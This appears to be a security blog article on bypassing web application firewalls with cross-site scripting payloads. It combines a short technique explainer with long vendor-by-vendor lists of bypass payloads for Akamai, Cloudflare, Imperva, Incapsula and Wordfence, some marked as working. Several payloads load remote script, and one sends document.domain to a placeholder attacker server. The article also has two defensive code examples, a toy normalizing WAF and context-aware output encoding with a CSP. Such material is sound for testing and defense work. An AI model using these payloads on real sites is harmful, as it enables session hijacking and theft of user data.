kahmeleone

Hey Folks

Let’s See

Introduction
Web Application Firewalls (WAFs) are essential security components designed to protect web applications from various types of attacks, including Cross-Site Scripting (XSS). However, sophisticated attackers often find ways to bypass WAFs, especially when it comes to injecting malicious XSS payloads. In this article, we'll explore some techniques used to bypass WAFs and execute XSS payloads successfully.
Understanding XSS and WAFs
Cross-Site Scripting (XSS) is a type of injection attack where an attacker injects malicious scripts into content that is then served to users. These scripts can steal user data, hijack sessions, or perform unauthorized actions on behalf of the user.
WAFs are designed to filter and monitor HTTP requests, blocking any malicious attempts based on predefined rules or learning algorithms. However, WAFs are not foolproof, and attackers constantly develop new methods to evade them.
Common WAF Bypass Techniques
- Obfuscation: Attackers often obfuscate their XSS payloads to bypass WAF detection. Techniques like encoding the payload in different formats (e.g., HTML entities, Base64) or breaking up the script with comments or unnecessary characters can trick the WAF into allowing the payload through. In the example below the CDATA markers are wrapped in JavaScript comments, so the browser still runs alert(1) while the extra tokens break up the pattern a signature is looking for.
<img src=x onerror="/*<![CDATA[*/alert(1)/*]]>*/">
- Using Alternate Event Handlers: WAFs may specifically filter common event handlers like onload and onerror, so less common handlers, or vectors that are not event handlers at all, are worth trying. The example below uses a CSS expression; note that expression() is a legacy Internet Explorer feature and does not execute in current browsers.
<div style="width:expression(alert(1))"></div>
- Polyglot Payloads: A polyglot XSS payload is one that can be interpreted in multiple contexts, increasing its chances of bypassing a WAF. These payloads are designed to execute regardless of whether they are processed as HTML, JavaScript, or another scripting language.
<script>/*</script><svg onload=alert(1)>*/
- Payload Splitting: Splitting the payload into multiple parts can sometimes evade detection, as WAFs may not correctly reassemble the script in its entirety. Check such payloads in a browser before relying on them: in the one below the single quotes end the attribute value after ja, so the browser never sees the concatenated string unless the surrounding quoting is stripped or decoded before the HTML is parsed.
<img src='1' onerror='ja'+'vascript:alert(1)'>
- Manipulating Headers: Some WAFs inspect specific HTTP headers for malicious content. By manipulating or injecting headers in a non-standard way, an attacker might bypass the WAF's inspection process. This only becomes XSS when the application later renders the header value (in a log viewer or an admin dashboard, for example), and which headers a WAF leaves uninspected varies by product and configuration, so the header has to be tested per target.
GET / HTTP/1.1
Host: victim.com
Content-Length: 0
X-Forwarded-For: '><script>alert(1)</script>
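The techniques above are easiest to reason about against concrete rules. The following is an added example, not code from the original article: a toy signature WAF in Python (naive_waf_blocks) with rules of the kind the text describes, a normalize step that does roughly what a browser does before parsing (repeated URL decoding, HTML character references with leading zeros or no semicolon, NUL removal, comment stripping, slashes and newlines as attribute separators), and hardened_waf_blocks, which runs broader rules on the normalized text. The attack strings are constructed from this page (the double-encoded one has its alert(1) rewritten as the tagged template alert`1`); the rule sets and the benign strings are assumptions made for the demonstration.

```python
import html
import re
from urllib.parse import unquote

# Rules of the kind a naive signature WAF applies (assumption for this example):
# a fixed list of event handlers and a fixed call syntax for the usual XSS probes.
NAIVE_RULES = [
    r"<script",
    r"<\w+[^>]*\bon(load|error|click)\s*=",
    r"\b(alert|prompt|confirm)\s*\(",
    r"javascript:",
]

# Same intent, written against the normalized form: any on* attribute on any tag,
# and a call made either with parentheses or as a tagged template (alert`1`).
HARDENED_RULES = [
    r"<script",
    r"<\w+[^>]*\bon\w+\s*=",
    r"\b(alert|prompt|confirm|eval|import)\s*[(`]",
    r"javascript:",
]


def normalize(payload: str) -> str:
    """Reduce a request value to roughly what the browser's HTML/JS parsers will see."""
    s = payload
    # URL-decode until stable: %253c -> %3c -> <, so double encoding gains nothing.
    for _ in range(4):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    # html.unescape follows the HTML5 rules a browser uses: leading zeros
    # (&#0000000040) and a missing semicolon (&#40document) are both accepted,
    # and named references such as &lpar; resolve as well.
    s = html.unescape(s)
    s = s.replace("\x00", "")                      # NUL bytes are dropped by the parser
    s = re.sub(r"/\*.*?\*/", "", s, flags=re.S)   # JS block comments used as filler (location/**/=)
    s = re.sub(r"[\s/]+", " ", s)                 # '/', tabs and newlines separate attributes like spaces
    return s.lower()


def naive_waf_blocks(payload: str) -> bool:
    """Toy signature WAF: one URL-decode pass, then case-insensitive regexes on the result."""
    s = unquote(payload)
    return any(re.search(r, s, re.I) for r in NAIVE_RULES)


def hardened_waf_blocks(payload: str) -> bool:
    """Same signature idea, but matched on the normalized form with broader handler coverage."""
    s = normalize(payload)
    return any(re.search(r, s) for r in HARDENED_RULES)


def evaluate(payloads, blocker):
    """Return the payloads that the given WAF function lets through."""
    return [p for p in payloads if not blocker(p)]


# Constructed sample input: attack strings taken from this page (the double-encoded one has
# its alert(1) rewritten as alert`1`), plus benign strings to measure false positives.
ATTACKS = [
    "<x onauxclick=a=alert,a(domain)>click",                       # uncommon handler, no call parentheses
    "<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>",             # mixed case, newlines as separators
    '"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;',  # numeric refs with leading zeros
    "<--%253cimg%20onerror=alert`1`%20src=a%253e --!>",             # double URL encoding, tagged template call
    'tarun"><x/onafterscriptexecute=confirm%26lpar;)//',            # named reference for '(' and '/' as separator
    "[1].find(confirm)",                                            # JS-context injection with no call syntax at all
]
BENIGN = [
    "hello world",
    "Use the <b>Save</b> button when you are done",
    "Please confirm (by email) before Friday",
]

if __name__ == "__main__":
    for name, blocker in (("naive", naive_waf_blocks), ("hardened", hardened_waf_blocks)):
        print(f"{name}: attacks passing = {evaluate(ATTACKS, blocker)}")
        print(f"{name}: benign blocked  = {[b for b in BENIGN if blocker(b)]}")
```

Run it and the naive rules pass all six attack strings, the normalizing version passes only [1].find(confirm), and both flag the benign "confirm (by email)". Normalization closes the encoding and separator tricks, but a signature still cannot tell a JavaScript-context injection from ordinary text, and it pays for its wider coverage in false positives; that is the argument for fixing the application rather than relying on the WAF.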
Now let's have a look at some WAF bypass payloads, grouped by the vendor they were reported against; the -@handle after a payload credits the researcher who shared it. Vendors update their rules, so expect some of these to be blocked by now and verify each one against the target before relying on it.

Akamai XSS Payloads
<style>@keyframes a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}`>
<marquee+loop=1+width=0+onfinish='new+Function`al\ert`1``'>
<svg><circle><set onbegin=prompt(1) attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`
<x onauxclick=import('//1152848220/')>click
<x onauxclick=a=alert,a(domain)>click -@niksthehacker
<x onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert`1``;
<script>Object.prototype.BOOMR = 1;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script> -@stealthybugs (a client-side prototype pollution gadget for the Akamai Boomerang script; see the PortSwigger XSS cheat sheet at https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
Cloudflare XSS payloads
Dec: <svg onload=prompt%26%230000000040document.domain)>
Hex: <svg onload=prompt%26%23x000000028;document.domain)>
xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
<--%253cimg%20onerror=alert(1)%20src=a%253e --!>
javascript:{ alert`0` }
1'"><img/src/onerror=.1|alert``>
<img src=x onError=import('//1152848220/')>
%2sscript%2ualert()%2s/script%2u
<svg on onload=(alert)(document.domain)>
<img ignored=() src=x onerror=prompt(1)>
<svg onx=() onload=(confirm)(1)>
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
<svg on =i onload=alert(domain) (working)
<svg/onload=location/**/='https://your.server/'+document.domain>
<svg onx=() onload=window.alert?.()> (working)
test",prompt%0A/*HelloWorld*/(document.domain) (working)- @Brutelogic
"onx+%00+onpointerenter%3dalert(domain)+x" (working)- @Brutelogic
"><svg%20onload=alert%26%230000000040"1")> (working)- @IamRenganathan
%27%09);%0d%0a%09%09[1].find(alert)//
"><img src=1 onmouseleave=print()> - @itsgeekymonk
<svg on onload=(alert)(document.domain)> -@zapstiko
<svg/on%20onload=alert(1)> (working) -@aufzayed
<img/src=x onError="`${x}`;alert(`Ex.Mi`);"> -@ex_mi
Cloudfront XSS payloads
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(`cloudfrontbypass`)//'>
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
"><img src=x onerror=confirm(1);>
Imperva XSS payloads
<x/onclick=globalThis['\u0070r\u006f'+'mpt']<)>clickme (working) -Pinaki @0xInfection (make sure to URL-encode the payload properly)
tarun"><x/onafterscriptexecute=confirm%26lpar;)// -@sratarun
[0][v+a+e+s](e+s+v+h+n)(/infected/.source)]click (working) -Pinaki @0xInfection (make sure the application decodes the payload from its encoded form)
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];"> - @xsspayloads
<svg onload\r\n=$.globalEval("al"+"ert()");>
<bleh/onclick=top[/al/.source+/ert/.source]	``>click Pinaki @0xInfection
<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;// -@AldenAous
Incapsula XSS payloads
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<iframe/onload="var b = 'document.domain)'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b; this['src']=a">
<img/src=q onerror='new Function`al\ert`1``'>
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
<svg onload\r\n=$.globalEval("al"+"ert()");>
[1].map(alert) or (alert)(1)
<"><details/open/ontoggle="jAvAsCrIpT:alert(/xss-by-tarun/)">XXXXX
[1].find(confirm)
<svg/onload=self[`aler`%2b`t`]`1`>
%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==%3E%3C/object%3E
'-[document.domain].map(alert)-'
WordFence XSS payloads
ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@naglinagli
<meter onmouseover="alert(1)" -@manjith27945363
'">><meter onmouseover="alert(1)"" -@manjith27945363
>><marquee loop=1 width=0 onfinish=alert(1)> -@manjith27945363
Wordfence 7.4.2 -@brutelogic
Best Practices for Defenders
While understanding how attackers bypass WAFs is crucial, it's equally important for defenders to continuously update WAF rules, employ multiple layers of security, and conduct regular security assessments.
- Regular Updates: Keep WAF signatures and rules up-to-date to cover new and emerging threats.
- Defense-in-Depth: Utilize a combination of security mechanisms (e.g., input validation, Content Security Policy) alongside the WAF for better protection.
- Security Testing: Regularly perform penetration testing and security assessments to identify and patch any vulnerabilities that could be exploited.
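Defense-in-depth as the list describes it, as an added example that is not from the original article: a Python rendering function that applies context-specific output encoding (HTML body, HTML attribute, JavaScript string) and emits a nonce-based Content-Security-Policy header, shown next to an unsafe renderer that interpolates the value directly. The function names, the page template and the policy are assumptions for illustration; the encoders use only the standard library.

```python
import html
import json
import secrets


def encode_for_html_body(value: str) -> str:
    """Text between tags: '<', '>' and '&' must not survive."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Quoted attribute value: additionally neutralise both quote characters."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """A JavaScript string literal inside a <script> block.

    json.dumps escapes quotes, backslashes and (with ensure_ascii) non-ASCII text;
    '<' and '>' are escaped as well so a value containing </script> cannot end the block.
    """
    return json.dumps(value).replace("<", "\\u003c").replace(">", "\\u003e")


def csp_header(nonce: str) -> str:
    """Nonce-based policy: only scripts carrying this request's nonce run, plus what they
    load ('strict-dynamic'); an injected inline script has no nonce and is refused."""
    return f"script-src 'nonce-{nonce}' 'strict-dynamic'; object-src 'none'; base-uri 'none'"


# Hypothetical page template with one untrusted value in three different contexts.
PAGE = """<!doctype html>
<p>Hello, {body}</p>
<input name="display_name" value="{attr}">
<script nonce="{nonce}">var displayName = {js};</script>
"""


def render_page_unsafe(untrusted: str) -> str:
    """The vulnerable pattern: the same value pasted into all three contexts verbatim."""
    return PAGE.format(body=untrusted, attr=untrusted, nonce="", js='"' + untrusted + '"')


def render_page(untrusted: str, nonce: str = None):
    """Hardened: one encoder per context, and a CSP header tied to a fresh nonce."""
    nonce = nonce or secrets.token_urlsafe(16)
    body = PAGE.format(
        body=encode_for_html_body(untrusted),
        attr=encode_for_html_attribute(untrusted),
        nonce=nonce,
        js=encode_for_js_string(untrusted),
    )
    return {"Content-Security-Policy": csp_header(nonce)}, body


if __name__ == "__main__":
    probe = '"><svg onload=alert(1)>'   # constructed probe, the kind of string in the lists above
    print(render_page_unsafe(probe))
    headers, page = render_page(probe)
    print(headers["Content-Security-Policy"])
    print(page)
```

With the encoded output none of the payloads in this article can create a tag or escape a string, whatever the WAF does with them, and the nonce policy stops any inline script that still gets injected through a path the encoders missed. Encoding per context is the part that matters: a single HTML escape applied to a value that lands inside a script block does not stop </script> from ending it, which is why the JavaScript encoder escapes angle brackets separately.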
Conclusion
Bypassing a WAF with XSS payloads requires creativity and a deep understanding of both the WAF's limitations and the web application itself. While WAFs provide a strong line of defense, they should not be solely relied upon. A layered security approach combined with continuous monitoring and testing is essential to defend against these sophisticated attacks.
Additionally

About the Author
Shubham Goyal: Certified Ethical Hacker, information security analyst, penetration tester and researcher. He can be contacted on LinkedIn.